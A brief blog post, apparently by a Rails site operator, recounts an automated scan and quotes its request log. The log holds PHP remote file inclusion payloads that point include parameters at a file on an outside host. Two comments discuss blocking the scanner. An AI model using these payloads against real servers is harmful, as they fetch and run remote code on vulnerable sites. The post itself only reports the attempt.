I thought it was funny that they'd be so blatent, but also because our site is a Ruby on Rails application and as such is invulnerable to PHP exploits. It was hitting up URLs like this is rapid succession:
/www/lib/head_auth.php?CFG[PREPEND_FILE]=http://69.46.228.240/dotproject/includes/1.gif?//webcalendar/tools/send_reminders.php?includedir=http://69.46.228.240/dotproject/includes/1.gif?//templates/mangobery/footer.sample.php?Site_Path=http://69.46.228.240/dotproject/includes/1.gif?//tools/update_translations.php?_SESSION[path]=http://69.46.228.240/dotproject/includes/1.gif?/Anyway, to the script kiddie who was running box 80.98.255.56, can't blame you for trying hey :)
Posts
2 comments:
Was on my server too... I tarpit them in my router. Less strain on my logs!
@vänsterwiki yeah, we should do the same but it only happened to us the one time. I think they might have given up because we just returned the same error message with HTTP status 500 to each request.
Post a Comment